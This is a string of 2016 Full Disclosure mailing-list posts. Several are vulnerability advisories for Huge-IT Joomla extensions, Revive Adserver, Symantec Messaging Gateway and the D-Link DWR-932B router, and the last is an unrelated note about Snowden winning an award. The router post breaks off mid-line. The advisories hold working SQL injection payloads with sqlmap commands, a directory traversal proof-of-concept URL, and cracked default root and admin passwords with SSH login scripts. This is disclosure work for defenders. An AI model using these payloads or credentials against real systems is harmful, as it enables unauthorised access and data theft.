[FD] Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla
Title: Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla Author: Larry W. Cashdollar, @_larry0 Date: 2016-09-16 Download Site: http://huge-it.com/joomla-catalog/ Vendor: huge-it.com Vendor Notified: 2016-09-17 Vendor Contact: i...@huge-it.com Description: Huge-IT Product Catalog is made for demonstration, sale, advertisements for your products. Imagine a stand with a variety of catalogs with a specific product category. To imagine is not difficult, to use is even easier. Vulnerability: The following code does not prevent an unauthenticated user from injecting SQL into functions via 'load_more_elements_into_catalog' located in ajax_url.php. Vulnerable Code in : ajax_url.php 11 define('_JEXEC', 1); 12 defined('_JEXEC') or die('Restircted access'); . . . 308 } elseif ($_POST["post"] == "load_more_elements_into_catalog") { 309 $catalog_id = $_POST["catalog_id"]; 310 $old_count = $_POST["old_count"]; 311 $count_into_page = $_POST["count_into_page"]; 312 $show_thumbs = $_POST["show_thumbs"]; 313 $show_description = $_POST["show_description"]; 314 $show_linkbutton = $_POST["show_linkbutton"]; 315 $parmalink = $_POST["parmalink"]; 316 $level = $_POST['level']; . . . 359 $query->select('*'); 360 $query->from('#__huge_it_catalog_products'); 361 $query->where('catalog_id =' . $catalog_id); 362 $query->order('ordering asc'); 363 $db->setQuery($query, $from, $count_into_page); CVE-2016-1000125 Exploit Code: • $ sqlmap -u 'http://example.com/components/com_catalog/ajax_url.php' --data="prod_page=1&post=load_more_elements_into_catalog&catalog_id=*&old_count=*&count_into_page=*&show_thumbs=*&show_description=*&parmalink=*" --level=5 --risk=3 • • Parameter: #1* ((custom) POST) • Type: error-based • Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) • Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-2369 OR 1 GROUP BY CONCAT(0x717a627871,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0 END)),0x716b787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink= • • Type: AND/OR time-based blind • Title: MySQL >= 5.0.12 time-based blind - Parameter replace • Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=(CASE WHEN (7371=7371) THEN SLEEP(5) ELSE 7371 END)&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink= • • Type: UNION query • Title: Generic UNION query (random number) - 15 columns • Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-5943 UNION ALL SELECT 2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,CONCAT(0x717a627871,0x494a475477424c724f6f7853556d61597544576f4b614d6e41596771595253476c4251797a685974,0x716b787671)-- FvOy&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink= • --- • [16:48:10] [INFO] the back-end DBMS is MySQL • web server operating system: Linux Debian 8.0 (jessie) • web application technology: Apache 2.4.10 • back-end DBMS: MySQL >= 5.0.12 • [16:48:10] [WARNING] HTTP error codes detected during run: • 500 (Internal Server Error) - 6637 times • [16:48:10] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com' • • [*] shutting down at 16:48:10 • Advisory: http://www.vapidlabs.com/advisory.php?v=171 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla
Title: Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla Author: Larry W. Cashdollar, @_larry0 Date: 2016-09-15 Download Site: http://huge-it.com/joomla-video-gallery/ Vendor: www.huge-it.com, fixed v1.1.0 Vendor Notified: 2016-09-17 Vendor Contact: i...@huge-it.com Description: A video slideshow gallery. Vulnerability: The following code does not prevent an unauthenticated user from injecting SQL into functions located in ajax_url.php. Vulnerable Code in : ajax_url.php 11 define('_JEXEC',1); 12 defined('_JEXEC') or die('Restircted access'); . . . 28 if($_POST['task']=="load_videos_content"){ 29 30 $page = 1; 31 32 33 if(!empty($_POST["page"]) && is_numeric($_POST['page']) && $_POST['page']>0){ 34 $paramssld=''; 35 $db5 = JFactory::getDBO(); 36 $query5 = $db->getQuery(true); 37 $query5->select('*'); 38 $query5->from('#__huge_it_videogallery_params'); 39 $db->setQuery($query5); 40 $options_params = $db5->loadObjectList(); 41 foreach ($options_params as $rowpar) { 42 $key = $rowpar->name; 43 $value = $rowpar->value; 44 $paramssld[$key] = $value; 45 } 46 $page = $_POST["page"]; 47 $num=$_POST['perpage']; 48 $start = $page * $num - $num; 49 $idofgallery=$_POST['galleryid']; 50 51 $query = $db->getQuery(true); 52 $query->select('*'); 53 $query->from('#__huge_it_videogallery_videos'); 54 $query->where('videogallery_id ='.$idofgallery); 55 $query ->order('#__huge_it_videogallery_videos.ordering asc'); 56 $db->setQuery($query,$start,$num); CVE-2016-1000123 JSON: Export Exploit Code: • $ sqlmap -u 'http://example.com/components/com_videogallerylite/ajax_url.php' --data="page=1&galleryid=*&task=load_videos_content&perpage=20&linkbutton=2" --level=5 --risk=3 • . • . • . • (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] • sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests: • --- • Parameter: #1* ((custom) POST) • Type: error-based • Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) • Payload: page=1&galleryid=-3390 OR 1 GROUP BY CONCAT(0x716b766271,(SELECT (CASE WHEN (2575=2575) THEN 1 ELSE 0 END)),0x7170767071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&task=load_videos_content&perpage=20&linkbutton=2 • • Type: AND/OR time-based blind • Title: MySQL >= 5.0.12 time-based blind - Parameter replace • Payload: page=1&galleryid=(CASE WHEN (5952=5952) THEN SLEEP(5) ELSE 5952 END)&task=load_videos_content&perpage=20&linkbutton=2 • --- • [19:36:55] [INFO] the back-end DBMS is MySQL • web server operating system: Linux Debian 8.0 (jessie) • web application technology: Apache 2.4.10 • back-end DBMS: MySQL >= 5.0.12 • [19:36:55] [WARNING] HTTP error codes detected during run: • 500 (Internal Server Error) - 2714 times • [19:36:55] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4' • • [*] shutting down at 19:36:55 Screen Shots: Advisory: http://www.vapidlabs.com/advisory.php?v=169 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [REVIVE-SA-2016-002] Revive Adserver - Multiple vulnerabilities
Revive Adserver Security Advisory REVIVE-SA-2016-002 http://www.revive-adserver.com/security/revive-sa-2016-002 CVE-IDs: TBA Date: 2016-09-28 Risk Level:Medium Applications affected: Revive Adserver Versions affected: <= 3.2.4 Versions not affected: >= 3.2.5, >= 4.0.0 Website: http://www.revive-adserver.com/ Vulnerability 1 - Reflected file download CVE-ID: TBA CWE-ID: CWE-79 CVSSv2: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C) CVSSv3 Vector CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H/E:F/RL:O/RC:C CVSSv3 Base Score: 9.6 CVSSv3 Temporal Score: 8.9 Abdullah Hussam has reported via HackerOne that www/delivery/asyncspc.php was vulnerable to the fairly new Reflected File Download (RFD) web attack vector that enables attackers to gain complete control over a victim's machine by virtually downloading a file from a trusted domain. References == https://cwe.mitre.org/data/definitions/79.html https://github.com/revive-adserver/revive-adserver/commit/69aacbd2 Vulnerability 2 - Special Element Injection CVE-ID: TBA CWE-ID: CWE-75 CVSSv2: 2.1 (AV:N/AC:H/Au:S/C:N/I:P/A:N) CVSSv3 Vector CVSS:3.0/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:N/E:U/RL:O/RC:C CVSSv3 Base Score: 3.1 CVSSv3 Temporal Score: 2.7 Joel Noguera has reported via HackerOne that usernames weren't properly sanitised when creating users on a Revive Adserver instance. Especially, control characters were not filtered, allowing apparently identical usernames to co-exist in the system, due to the fact that such characters are normally ignored when an HTML page is displayed in a browser. The issue could have therefore been exploited for user spoofing, although elevated privileges are required to create users within Revive Adserver. References == https://cwe.mitre.org/data/definitions/75.html https://github.com/revive-adserver/revive-adserver/commit/05b1eceb Vulnerability 3 - Reflected XSS CVE-ID: TBA CWE-ID: CWE-79 CVSSv2: 4 (AV:N/AC:H/Au:N/C:P/I:P/A:N) CVSSv3 Vector CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N/E:U/RL:O/RC:C CVSSv3 Base Score: 4.2 CVSSv3 Temporal Score: 3.7 The HackerOne user pavanw3b has reported that the Revive Adserver web installer scripts were vulnerable to a reflected XSS attack via the dbHost, dbUser and possibly other parameters. It has to be noted that the window for such attack vectors to be possible is extremely narrow and it is very unlikely that such an attack could be actually effective. References == https://cwe.mitre.org/data/definitions/79.html https://github.com/revive-adserver/revive-adserver/commit/14ff73f0 https://github.com/revive-adserver/revive-adserver/commit/fcf72c8a Solution We strongly advise people to upgrade to the most recent 4.0.0 or 3.2.5 releases of Revive Adserver, including those running OpenX Source or older versions of the application. Contact Information The security contact for Revive Adserver can be reached at: . Please review http://www.revive-adserver.com/security/ before doing so. -- Matteo Beccati On behalf of the Revive Adserver Team http://www.revive-adserver.com/ signature.asc Description: OpenPGP digital signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Symantec Messaging Gateway <= 10.6.1 Directory Traversal
# Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal # Date : 28/09/2016 # Author : R-73eN # Tested on : Symantec Messaging Gateway 10.6.1 (Latest) # Software : https://www.symantec.com/products/threat-protection/messaging-gateway # Vendor : Symantec # CVE : CVE-2016-5312 # DESCRIPTION: # A charting component in the Symantec Messaging Gateway control center does not properly sanitize user input submitted for charting requests. # This could potentially result in an authorized but less privileged user gaining access to paths outside the authorized directory. # This could potentially provide read access to some files/directories on the server for which the user is not authorized. # Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal # Date : 28/09/2016 # Author : R-73eN # Tested on : Symantec Messaging Gateway 10.6.1 (Latest) # Software : https://www.symantec.com/products/threat-protection/messaging-gateway # Vendor : Symantec # CVE : CVE-2016-5312 # Vendor Advisory and Fix: https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160927_00 # # _____ __ # |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | # | || '_ \| |_ / _ \| | _ / _ \ '_ \/ _ \ | | # | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ # |___|_| |_|_| \___/ \|\___|_| |_| /_/ \_\_| # # # DESCRIPTION: # # A charting component in the Symantec Messaging Gateway control center does not properly sanitize user input submitted for charting requests. # This could potentially result in an authorized but less privileged user gaining access to paths outside the authorized directory. # This could potentially provide read access to some files/directories on the server for which the user is not authorized. # The problem relies in the package kavachart-kcServlet-5.3.2.jar , File : com/ve/kavachart/servlet/ChartStream.java The vulnerable code is extends HttpServlet { public void doGet(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse) { block6 : { try { String string = httpServletRequest.getParameter("sn"); // Taking parameter "sn" and writing it to the "string variable" if (string == null) break block6; String string2 = string.substring(string.length() - 3); byte[] arrby = (byte[])this.getServletContext().getAttribute(string); // The string variable is passed here without any sanitanization for directory traversal // and you can successfully use this to do a directory traversal. if (arrby != null) { httpServletResponse.setContentType("image/" + string2); ServletOutputStream servletOutputStream = httpServletResponse.getOutputStream(); httpServletResponse.setContentLength(arrby.length); servletOutputStream.write(arrby); this.getServletContext().removeAttribute(string); break block6; } POC: https://IP-address:PORT/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/lib ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Multiple vulnerabilities found in the Dlink DWR-932B (backdoor, backdoor accounts, weak WPS, RCE ...)
Hello, Please find a text-only version below sent to security mailing lists. The complete version on analysing the security in Dlink 932B LTE routers is posted here: https://pierrekim.github.io/blog/2016-09-28-dlink-dwr-932b-lte-routers-vulnerabilities.html === text-version of the advisory without technical explanations === -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 ## Advisory Information Title: Multiple vulnerabilities found in the Dlink DWR-932B (backdoor, backdoor accounts, weak WPS, RCE ...) Advisory URL: https://pierrekim.github.io/advisories/2016-dlink-0x00.txt Blog URL: https://pierrekim.github.io/blog/2016-09-28-dlink-dwr-932b-lte-routers-vulnerabilities.html Date published: 2016-09-28 Vendors contacted: Dlink Release mode: Released CVE: no current CVE DWF: no current DWF ## Product Description Dlink is a multinational networking equipment manufacturing corporation. ## Vulnerabilities Summary The Dlink DWR-932B is a LTE router / access point overall badly designed with a lot of vulnerabilities. It's available in a number of countries to provide Internet with a LTE network. It's a model based on the (in)famous Quanta LTE router models and inherits some vulnerabilities. The tests below are done using the latest available firmware (firmware DWR-932_fw_revB_2_02_eu_en_20150709.zip, model revision B, /Share3/DailyBuild/QDX_DailyBuild/QDT_2031_DLINK/QDT_2031_OS/source/LINUX/apps_proc/oe-core/build/tmp-eglibc/sysroots/x86_64-linux/usr/bin/armv7a-vfp-neon-oe-linux-gnueabi/arm-oe-linux-gnueabi-gcc). The summary of the vulnerabilities is: - Backdoor accounts - Backdoor - Default WPS PIN - Weak WPS PIN Generation - with a reverse-engineered algorithm - Leaking No-IP account (?) - Multiple vulnerabilities in the HTTP daemon (qmiweb) - Remote FOTA (Firmware Over The Air) - Bad security practices - Security removed in UPnP A personal point of view: at best, the vulnerabilites are due to incompetence; at worst, it is a deliberate act of security sabotage from the vendor. Not all the vulnerabilities found have been disclosed in this advisory. Only the significant ones are shown. This router is still on sale. Due to lack of security patches provided by the vendor, the vulnerabilities will remain unpatched and customers with questions should contact their local/regional D-Link support office for the latest information. ## Details - Backdoor accounts By default, telnetd and SSHd are running in the router. Telnetd is running even if there is no documentation about it: user@kali:~$ cat ./etc/init.d/start_appmgr [...] #Sandro { for telnetd debug... start-stop-daemon -S -b -a /bin/logmaster #if [ -e /config2/telnetd ]; then start-stop-daemon -S -b -a /sbin/telnetd #fi #Sandro } [...] 2 backdoor accounts exist and can be used to bypass the HTTP authentication used to manage the router. admin@homerouter:~$ grep admin /etc/passwd admin:htEcF9TWn./9Q:168:168:admin:/:/bin/sh admin@homerouter:~$ The password for admin is 'admin' and can be found in the /bin/appmgr program using IDA: About the root user: user@kali:~$ cat ./etc/shadow root:aRDiHrJ0OkehM:16270:0:9:7::: daemon:*:16270:0:9:7::: bin:*:16270:0:9:7::: sys:*:16270:0:9:7::: sync:*:16270:0:9:7::: games:*:16270:0:9:7::: man:*:16270:0:9:7::: lp:*:16270:0:9:7::: mail:*:16270:0:9:7::: news:*:16270:0:9:7::: uucp:*:16270:0:9:7::: proxy:*:16270:0:9:7::: www-data:*:16270:0:9:7::: backup:*:16270:0:9:7::: list:*:16270:0:9:7::: irc:*:16270:0:9:7::: gnats:*:16270:0:9:7::: diag:*:16270:0:9:7::: nobody:*:16270:0:9:7::: messagebus:!:16270:0:9:7::: avahi:!:16270:0:9:7::: admin@kali:~$ Using john to crack the hashes: user@kali:~$ john -show shadow+passwd admin:admin:admin:/:/bin/sh root:1234:16270:0:9:7::: 2 password hashes cracked, 0 left user@kali:~$ Results: - admin has password admin - root has password 1234 Working exploit for admin: user@kali:~$ cat quanta-ssh-default-password-admin #!/usr/bin/expect -f set timeout 3 spawn ssh admin@192.168.1.1 expect "password: $" send "admin\r" interact user@kali:~$ ./quanta-ssh-default-password-admin spawn ssh admin@192.168.1.1 admin@192.168.1.1's password: admin@homerouter:~$ id uid=168(admin) gid=168(admin) groups=168(admin) admin@homerouter:~$ Alternatively, you can fetch it at https://pierrekim.github.io/advisories/quanta-ssh-default-password-admin. Working exploit for root: user@kali:~$ cat quanta-ssh-default-password-root #!/usr/bin/expect -f set timeout 3 spawn ssh root@192.168.1.1 expect "password: $" send "1234\r" interact user@kali:~$ ./quanta-ssh-default-password-root spawn ssh root@192.168.1.1 root@192.168.1.1's pa
[FD] Edward Snowden won Glas of Reason - (Glas der Vernunft) Award 2016
Award 2016 "Glas of Reason" (Glas der Vernunft) for Edward Snowden (10.000€) @snowden - Security Press Articles http://www.mirror.co.uk/news/world-news/german-city-gives-nsa-whistleblower-8913033 http://www.bild.de/wa/ll/bild-de/unangemeldet-42925516.bild.html http://www.stern.de/panorama/kasseler-buergerpreis-geht-an-edward-snowden-7073662.html http://www.zdnet.de/88272377/glas-der-vernunft-kasseler-buerger-ehren-edward-snowden/ http://www.zeit.de/news/2016-09/25/auszeichnungen-kasseler-buergerpreis-geht-an-edward-snowden-25061402 http://www.focus.de/regional/kassel/auszeichnungen-kasseler-buergerpreis-geht-an-edward-snowden_id_5984583.html https://www.heise.de/newsticker/meldung/Edward-Snowden-mit-Kasseler-Buergerpreis-ausgezeichnet-3331286.html - http://hessenschau.de/tv-sendung/video-21974.html https://www.hna.de/kassel/glas-vernunft-kassel-verliehen-snowden-wurde-zugeschaltet-6782520.html http://www.wetter.de/cms/edward-snowden-mit-kasseler-buergerpreis-das-glas-der-vernunft-ausgezeichnet-4012717.html http://www.arcor.de/content/aktuell/regional_news/hessen/5238264,1,Auszeichnungen--Edward-Snowden-mit-Kasseler-B%C3%BCrgerpreis-ausgezeichnet,content.html http://www.ffh.de/news-service/ffh-nachrichten/nController/News/nAction/show/nCategory/nordhessen/nId/77386/nItem/edward-snowden-bekommt-kasseler-buergerpreis.html http://www.dw.com/de/whistleblower-edward-snowden-erh%C3%A4lt-kasseler-b%C3%BCrgerpreis/a-35886447 http://www.ad-hoc-news.de/kassel-der-whistleblower-edward-snowden-wird-heute-mit--/de/News/51270557 http://www.kassel-live.de/?s=edward+snowden&submit=Suche - Note: The video recodings will be published transparently by an uncensored german source within the next days! Feel free to share and enjoy the unique statement. ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/